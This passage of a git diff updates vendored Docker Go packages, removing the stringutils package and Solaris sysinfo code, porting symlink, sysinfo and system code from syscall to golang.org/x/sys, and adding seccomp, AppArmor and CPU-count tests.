-		return s
-	}
-	if maxlen <= 3 {
-		return string(r[:maxlen])
-	}
-	return string(r[:maxlen-3]) + "..."
-}
-
-// Truncate truncates a string to maxlen.
-func Truncate(s string, maxlen int) string {
-	r := []rune(s)
-	if len(r) <= maxlen {
-		return s
-	}
-	return string(r[:maxlen])
-}
-
-// InSlice tests whether a string is contained in a slice of strings or not.
-// Comparison is case insensitive
-func InSlice(slice []string, s string) bool {
-	for _, ss := range slice {
-		if strings.ToLower(s) == strings.ToLower(ss) {
-			return true
-		}
-	}
-	return false
-}
-
-func quote(word string, buf *bytes.Buffer) {
-	// Bail out early for "simple" strings
-	if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! \t\n") {
-		buf.WriteString(word)
-		return
-	}
-
-	buf.WriteString("'")
-
-	for i := 0; i < len(word); i++ {
-		b := word[i]
-		if b == '\'' {
-			// Replace literal ' with a close ', a \', and a open '
-			buf.WriteString("'\\''")
-		} else {
-			buf.WriteByte(b)
-		}
-	}
-
-	buf.WriteString("'")
-}
-
-// ShellQuoteArguments takes a list of strings and escapes them so they will be
-// handled right when passed as arguments to a program via a shell
-func ShellQuoteArguments(args []string) string {
-	var buf bytes.Buffer
-	for i, arg := range args {
-		if i != 0 {
-			buf.WriteByte(' ')
-		}
-		quote(arg, &buf)
-	}
-	return buf.String()
-}
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
deleted file mode 100644
index 8af2bdcc0b..0000000000
--- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
+++ /dev/null
@@ -1,121 +0,0 @@
-package stringutils
-
-import "testing"
-
-func testLengthHelper(generator func(int) string, t *testing.T) {
-	expectedLength := 20
-	s := generator(expectedLength)
-	if len(s) != expectedLength {
-		t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength)
-	}
-}
-
-func testUniquenessHelper(generator func(int) string, t *testing.T) {
-	repeats := 25
-	set := make(map[string]struct{}, repeats)
-	for i := 0; i < repeats; i = i + 1 {
-		str := generator(64)
-		if len(str) != 64 {
-			t.Fatalf("Id returned is incorrect: %s", str)
-		}
-		if _, ok := set[str]; ok {
-			t.Fatalf("Random number is repeated")
-		}
-		set[str] = struct{}{}
-	}
-}
-
-func isASCII(s string) bool {
-	for _, c := range s {
-		if c > 127 {
-			return false
-		}
-	}
-	return true
-}
-
-func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) {
-	testLengthHelper(GenerateRandomAlphaOnlyString, t)
-}
-
-func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) {
-	testUniquenessHelper(GenerateRandomAlphaOnlyString, t)
-}
-
-func TestGenerateRandomAsciiStringLength(t *testing.T) {
-	testLengthHelper(GenerateRandomASCIIString, t)
-}
-
-func TestGenerateRandomAsciiStringUniqueness(t *testing.T) {
-	testUniquenessHelper(GenerateRandomASCIIString, t)
-}
-
-func TestGenerateRandomAsciiStringIsAscii(t *testing.T) {
-	str := GenerateRandomASCIIString(64)
-	if !isASCII(str) {
-		t.Fatalf("%s contained non-ascii characters", str)
-	}
-}
-
-func TestEllipsis(t *testing.T) {
-	str := "t🐳ststring"
-	newstr := Ellipsis(str, 3)
-	if newstr != "t🐳s" {
-		t.Fatalf("Expected t🐳s, got %s", newstr)
-	}
-	newstr = Ellipsis(str, 8)
-	if newstr != "t🐳sts..." {
-		t.Fatalf("Expected tests..., got %s", newstr)
-	}
-	newstr = Ellipsis(str, 20)
-	if newstr != "t🐳ststring" {
-		t.Fatalf("Expected t🐳ststring, got %s", newstr)
-	}
-}
-
-func TestTruncate(t *testing.T) {
-	str := "t🐳ststring"
-	newstr := Truncate(str, 4)
-	if newstr != "t🐳st" {
-		t.Fatalf("Expected t🐳st, got %s", newstr)
-	}
-	newstr = Truncate(str, 20)
-	if newstr != "t🐳ststring" {
-		t.Fatalf("Expected t🐳ststring, got %s", newstr)
-	}
-}
-
-func TestInSlice(t *testing.T) {
-	slice := []string{"t🐳st", "in", "slice"}
-
-	test := InSlice(slice, "t🐳st")
-	if !test {
-		t.Fatalf("Expected string t🐳st to be in slice")
-	}
-	test = InSlice(slice, "SLICE")
-	if !test {
-		t.Fatalf("Expected string SLICE to be in slice")
-	}
-	test = InSlice(slice, "notinslice")
-	if test {
-		t.Fatalf("Expected string notinslice not to be in slice")
-	}
-}
-
-func TestShellQuoteArgumentsEmpty(t *testing.T) {
-	actual := ShellQuoteArguments([]string{})
-	expected := ""
-	if actual != expected {
-		t.Fatalf("Expected an empty string")
-	}
-}
-
-func TestShellQuoteArguments(t *testing.T) {
-	simpleString := "simpleString"
-	complexString := "This is a 'more' complex $tring with some special char *"
-	actual := ShellQuoteArguments([]string{simpleString, complexString})
-	expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'"
-	if actual != expected {
-		t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual)
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
index 34c4ea7c50..b9fbf3c98f 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
+++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
@@ -176,7 +176,7 @@
 
    END OF TERMS AND CONDITIONS
 
-   Copyright 2014-2016 Docker, Inc.
+   Copyright 2014-2017 Docker, Inc.
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
index 9b4f4a294e..4c056c5ed2 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
+++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
@@ -1,4 +1,4 @@
-Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved.
+Copyright (c) 2014-2017 The Docker & Go Authors. All rights reserved.
 
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go
index f6bc2231f6..7b894cde73 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/fs.go
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go
@@ -4,7 +4,7 @@
 
 // This code is a modified version of path/filepath/symlink.go from the Go standard library.
 
-package symlink
+package symlink // import "github.com/docker/docker/pkg/symlink"
 
 import (
 	"bytes"
@@ -40,7 +40,7 @@ func FollowSymlinkInScope(path, root string) (string, error) {
 //
 // Example:
 //   If /foo/bar -> /outside,
-//   FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide"
+//   FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/outside"
 //
 // IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks
 // are created and not to create subsequently, additional symlinks that could potentially make a
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
index 22708273d6..c6dafcb0b9 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package symlink
+package symlink // import "github.com/docker/docker/pkg/symlink"
 
 import (
 	"path/filepath"
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
index 7085c0b666..9ed1dd70db 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
@@ -2,7 +2,7 @@
 
 // Licensed under the Apache License, Version 2.0; See LICENSE.APACHE
 
-package symlink
+package symlink // import "github.com/docker/docker/pkg/symlink"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
index 241e531f9d..754761717b 100644
--- a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go
@@ -1,4 +1,4 @@
-package symlink
+package symlink // import "github.com/docker/docker/pkg/symlink"
 
 import (
 	"bytes"
@@ -6,49 +6,49 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
-	"syscall"
 
 	"github.com/docker/docker/pkg/longpath"
+	"golang.org/x/sys/windows"
 )
 
 func toShort(path string) (string, error) {
-	p, err := syscall.UTF16FromString(path)
+	p, err := windows.UTF16FromString(path)
 	if err != nil {
 		return "", err
 	}
 	b := p // GetShortPathName says we can reuse buffer
-	n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b)))
+	n, err := windows.GetShortPathName(&p[0], &b[0], uint32(len(b)))
 	if err != nil {
 		return "", err
 	}
 	if n > uint32(len(b)) {
 		b = make([]uint16, n)
-		if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil {
+		if _, err = windows.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil {
 			return "", err
 		}
 	}
-	return syscall.UTF16ToString(b), nil
+	return windows.UTF16ToString(b), nil
 }
 
 func toLong(path string) (string, error) {
-	p, err := syscall.UTF16FromString(path)
+	p, err := windows.UTF16FromString(path)
 	if err != nil {
 		return "", err
 	}
 	b := p // GetLongPathName says we can reuse buffer
-	n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b)))
+	n, err := windows.GetLongPathName(&p[0], &b[0], uint32(len(b)))
 	if err != nil {
 		return "", err
 	}
 	if n > uint32(len(b)) {
 		b = make([]uint16, n)
-		n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b)))
+		n, err = windows.GetLongPathName(&p[0], &b[0], uint32(len(b)))
 		if err != nil {
 			return "", err
 		}
 	}
 	b = b[:n]
-	return syscall.UTF16ToString(b), nil
+	return windows.UTF16ToString(b), nil
 }
 
 func evalSymlinks(path string) (string, error) {
@@ -65,7 +65,7 @@ func evalSymlinks(path string) (string, error) {
 	if err != nil {
 		return "", err
 	}
-	// syscall.GetLongPathName does not change the case of the drive letter,
+	// windows.GetLongPathName does not change the case of the drive letter,
 	// but the result of EvalSymlinks must be unique, so we have
 	// EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`).
 	// Make drive letter upper case.
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
index aeb1a3a804..eea2d25bf9 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go
@@ -1,6 +1,6 @@
 // +build !linux,!windows
 
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import (
 	"runtime"
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
index 5eacd35121..5f6c6df8c4 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go
@@ -1,11 +1,10 @@
-// +build linux
-
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import (
 	"runtime"
-	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 // numCPU queries the system for the count of threads available
@@ -15,10 +14,10 @@ import (
 // Returns 0 on errors. Use |runtime.NumCPU| in that case.
 func numCPU() int {
 	// Gets the affinity mask for a process: The very one invoking this function.
-	pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0)
+	pid, _, _ := unix.RawSyscall(unix.SYS_GETPID, 0, 0, 0)
 
 	var mask [1024 / 64]uintptr
-	_, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0])))
+	_, _, err := unix.RawSyscall(unix.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0])))
 	if err != 0 {
 		return 0
 	}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
index 1d89dd5503..13523f671f 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import (
 	"runtime"
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
index f046de4b16..8fc0ecc25e 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go
@@ -1,4 +1,4 @@
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import "github.com/docker/docker/pkg/parsers"
 
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
index 7ad84a8309..dde5be19bc 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go
@@ -1,4 +1,4 @@
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import (
 	"fmt"
@@ -6,15 +6,10 @@ import (
 	"os"
 	"path"
 	"strings"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/opencontainers/runc/libcontainer/cgroups"
-)
-
-const (
-	// SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER.
-	SeccompModeFilter = uintptr(2)
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func findCgroupMountpoints() (map[string]string, error) {
@@ -60,9 +55,9 @@ func New(quiet bool) *SysInfo {
 	}
 
 	// Check if Seccomp is supported, via CONFIG_SECCOMP.
-	if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL {
+	if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL {
 		// Make sure the kernel has CONFIG_SECCOMP_FILTER.
-		if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL {
+		if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL {
 			sysInfo.Seccomp = true
 		}
 	}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
index fae0fdffbb..13a07fbce9 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go
@@ -1,4 +1,4 @@
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import (
 	"io/ioutil"
@@ -6,29 +6,29 @@ import (
 	"path"
 	"path/filepath"
 	"testing"
+
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
 )
 
 func TestReadProcBool(t *testing.T) {
 	tmpDir, err := ioutil.TempDir("", "test-sysinfo-proc")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(tmpDir)
 
 	procFile := filepath.Join(tmpDir, "read-proc-bool")
-	if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(procFile, []byte("1"), 0644)
+	assert.NilError(t, err)
 
 	if !readProcBool(procFile) {
 		t.Fatal("expected proc bool to be true, got false")
 	}
 
-	if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil {
+	if err := ioutil.WriteFile(procFile, []byte("0"), 0644); err != nil {
 		t.Fatal(err)
 	}
 	if readProcBool(procFile) {
-		t.Fatal("expected proc bool to be false, got false")
+		t.Fatal("expected proc bool to be false, got true")
 	}
 
 	if readProcBool(path.Join(tmpDir, "no-exist")) {
@@ -39,20 +39,66 @@ func TestReadProcBool(t *testing.T) {
 
 func TestCgroupEnabled(t *testing.T) {
 	cgroupDir, err := ioutil.TempDir("", "cgroup-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(cgroupDir)
 
 	if cgroupEnabled(cgroupDir, "test") {
 		t.Fatal("cgroupEnabled should be false")
 	}
 
-	if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 0644)
+	assert.NilError(t, err)
 
 	if !cgroupEnabled(cgroupDir, "test") {
 		t.Fatal("cgroupEnabled should be true")
 	}
 }
+
+func TestNew(t *testing.T) {
+	sysInfo := New(false)
+	assert.Assert(t, sysInfo != nil)
+	checkSysInfo(t, sysInfo)
+
+	sysInfo = New(true)
+	assert.Assert(t, sysInfo != nil)
+	checkSysInfo(t, sysInfo)
+}
+
+func checkSysInfo(t *testing.T, sysInfo *SysInfo) {
+	// Check if Seccomp is supported, via CONFIG_SECCOMP.then sysInfo.Seccomp must be TRUE , else FALSE
+	if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL {
+		// Make sure the kernel has CONFIG_SECCOMP_FILTER.
+		if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL {
+			assert.Assert(t, sysInfo.Seccomp)
+		}
+	} else {
+		assert.Assert(t, !sysInfo.Seccomp)
+	}
+}
+
+func TestNewAppArmorEnabled(t *testing.T) {
+	// Check if AppArmor is supported. then it must be TRUE , else FALSE
+	if _, err := os.Stat("/sys/kernel/security/apparmor"); err != nil {
+		t.Skip("App Armor Must be Enabled")
+	}
+
+	sysInfo := New(true)
+	assert.Assert(t, sysInfo.AppArmor)
+}
+
+func TestNewAppArmorDisabled(t *testing.T) {
+	// Check if AppArmor is supported. then it must be TRUE , else FALSE
+	if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) {
+		t.Skip("App Armor Must be Disabled")
+	}
+
+	sysInfo := New(true)
+	assert.Assert(t, !sysInfo.AppArmor)
+}
+
+func TestNumCPU(t *testing.T) {
+	cpuNumbers := NumCPU()
+	if cpuNumbers <= 0 {
+		t.Fatal("CPU returned must be greater than zero")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
deleted file mode 100644
index c858d57e08..0000000000
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
+++ /dev/null
@@ -1,121 +0,0 @@
-// +build solaris,cgo
-
-package sysinfo
-
-import (
-	"bytes"
-	"os/exec"
-	"strconv"
-	"strings"
-)
-
-/*
-#cgo LDFLAGS: -llgrp
-#include <unistd.h>
-#include <stdlib.h>
-#include <sys/lgrp_user.h>
-int getLgrpCount() {
-	lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE;
-	uint_t nlgrps;
-
-	if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) {
-		return -1;
-	}
-	nlgrps = lgrp_nlgrps(lgrpcookie);
-	return nlgrps;
-}
-*/
-import "C"
-
-// IsCPUSharesAvailable returns whether CPUShares setting is supported.
-// We need FSS to be set as default scheduling class to support CPU Shares
-func IsCPUSharesAvailable() bool {
-	cmd := exec.Command("/usr/sbin/dispadmin", "-d")
-	outBuf := new(bytes.Buffer)
-	errBuf := new(bytes.Buffer)
-	cmd.Stderr = errBuf
-	cmd.Stdout = outBuf
-
-	if err := cmd.Run(); err != nil {
-		return false
-	}
-	return (strings.Contains(outBuf.String(), "FSS"))
-}
-
-// New returns a new SysInfo, using the filesystem to detect which features
-// the kernel supports.
-//NOTE Solaris: If we change the below capabilities be sure
-// to update verifyPlatformContainerSettings() in daemon_solaris.go
-func New(quiet bool) *SysInfo {
-	sysInfo := &SysInfo{}
-	sysInfo.cgroupMemInfo = setCgroupMem(quiet)
-	sysInfo.cgroupCPUInfo = setCgroupCPU(quiet)
-	sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet)
-	sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet)
-
-	sysInfo.IPv4ForwardingDisabled = false
-
-	sysInfo.AppArmor = false
-
-	return sysInfo
-}
-
-// setCgroupMem reads the memory information for Solaris.
-func setCgroupMem(quiet bool) cgroupMemInfo {
-
-	return cgroupMemInfo{
-		MemoryLimit:       true,
-		SwapLimit:         true,
-		MemoryReservation: false,
-		OomKillDisable:    false,
-		MemorySwappiness:  false,
-		KernelMemory:      false,
-	}
-}
-
-// setCgroupCPU reads the cpu information for Solaris.
-func setCgroupCPU(quiet bool) cgroupCPUInfo {
-
-	return cgroupCPUInfo{
-		CPUShares:          true,
-		CPUCfsPeriod:       false,
-		CPUCfsQuota:        true,
-		CPURealtimePeriod:  false,
-		CPURealtimeRuntime: false,
-	}
-}
-
-// blkio switches are not supported in Solaris.
-func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo {
-
-	return cgroupBlkioInfo{
-		BlkioWeight:       false,
-		BlkioWeightDevice: false,
-	}
-}
-
-// setCgroupCPUsetInfo reads the cpuset information for Solaris.
-func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo {
-
-	return cgroupCpusetInfo{
-		Cpuset: true,
-		Cpus:   getCPUCount(),
-		Mems:   getLgrpCount(),
-	}
-}
-
-func getCPUCount() string {
-	ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN)
-	if ncpus <= 0 {
-		return ""
-	}
-	return strconv.FormatInt(int64(ncpus), 16)
-}
-
-func getLgrpCount() string {
-	nlgrps := C.getLgrpCount()
-	if nlgrps <= 0 {
-		return ""
-	}
-	return strconv.FormatInt(int64(nlgrps), 16)
-}
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
index b61fbcf541..6a118b63c8 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go
@@ -1,4 +1,4 @@
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 import "testing"
 
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
index 45f3ef1c65..23cc695fb8 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go
@@ -1,8 +1,8 @@
-// +build !linux,!solaris,!windows
+// +build !linux,!windows
 
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
-// New returns an empty SysInfo for non linux nor solaris for now.
+// New returns an empty SysInfo for non linux for now.
 func New(quiet bool) *SysInfo {
 	sysInfo := &SysInfo{}
 	return sysInfo
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
index 4e6255bc59..5f68524e7e 100644
--- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
+++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package sysinfo
+package sysinfo // import "github.com/docker/docker/pkg/sysinfo"
 
 // New returns an empty SysInfo for windows for now.
 func New(quiet bool) *SysInfo {
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go
index 7637f12e1a..c26a4e24b6 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go
@@ -1,27 +1,10 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
-	"syscall"
 	"time"
-	"unsafe"
 )
 
-var (
-	maxTime time.Time
-)
-
-func init() {
-	if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 {
-		// This is a 64 bit timespec
-		// os.Chtimes limits time to the following
-		maxTime = time.Unix(0, 1<<63-1)
-	} else {
-		// This is a 32 bit timespec
-		maxTime = time.Unix(1<<31-1, 0)
-	}
-}
-
 // Chtimes changes the access time and modified time of a file at the given path
 func Chtimes(name string, atime time.Time, mtime time.Time) error {
 	unixMinTime := time.Unix(0, 0)
@@ -44,9 +27,5 @@ func Chtimes(name string, atime time.Time, mtime time.Time) error {
 	}
 
 	// Take platform specific action for setting create time.
-	if err := setCTime(name, mtime); err != nil {
-		return err
-	}
-
-	return nil
+	return setCTime(name, mtime)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go
index 5c87df32a2..5a3f98e199 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
index 09d58bcbfd..259138a45b 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"time"
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
index 6ec9a7173c..e25232c767 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
index 2945868465..d3a115ff42 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go
@@ -1,27 +1,26 @@
-// +build windows
-
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
-	"syscall"
 	"time"
+
+	"golang.org/x/sys/windows"
 )
 
 //setCTime will set the create time on a file. On Windows, this requires
 //calling SetFileTime and explicitly including the create time.
 func setCTime(path string, ctime time.Time) error {
-	ctimespec := syscall.NsecToTimespec(ctime.UnixNano())
-	pathp, e := syscall.UTF16PtrFromString(path)
+	ctimespec := windows.NsecToTimespec(ctime.UnixNano())
+	pathp, e := windows.UTF16PtrFromString(path)
 	if e != nil {
 		return e
 	}
-	h, e := syscall.CreateFile(pathp,
-		syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil,
-		syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0)
+	h, e := windows.CreateFile(pathp,
+		windows.FILE_WRITE_ATTRIBUTES, windows.FILE_SHARE_WRITE, nil,
+		windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS, 0)
 	if e != nil {
 		return e
 	}
-	defer syscall.Close(h)
-	c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec))
-	return syscall.SetFileTime(h, &c, nil, nil)
+	defer windows.Close(h)
+	c := windows.NsecToFiletime(windows.TimespecToNsec(ctimespec))
+	return windows.SetFileTime(h, &c, nil, nil)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
index 72d8a10619..d91e4bc6e4 100644
--- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go
index 288318985e..2573d71622 100644
--- a/vendor/github.com/docker/docker/pkg/system/errors.go
+++ b/vendor/github.com/docker/docker/pkg/system/errors.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"errors"
@@ -7,4 +7,7 @@ import (
 var (
 	// ErrNotSupportedPlatform means the platform is not supported.
 	ErrNotSupportedPlatform = errors.New("platform and architecture is not supported")
+
+	// ErrNotSupportedOperatingSystem means the operating system is not supported.
+	ErrNotSupportedOperatingSystem = errors.New("operating system is not supported")
 )
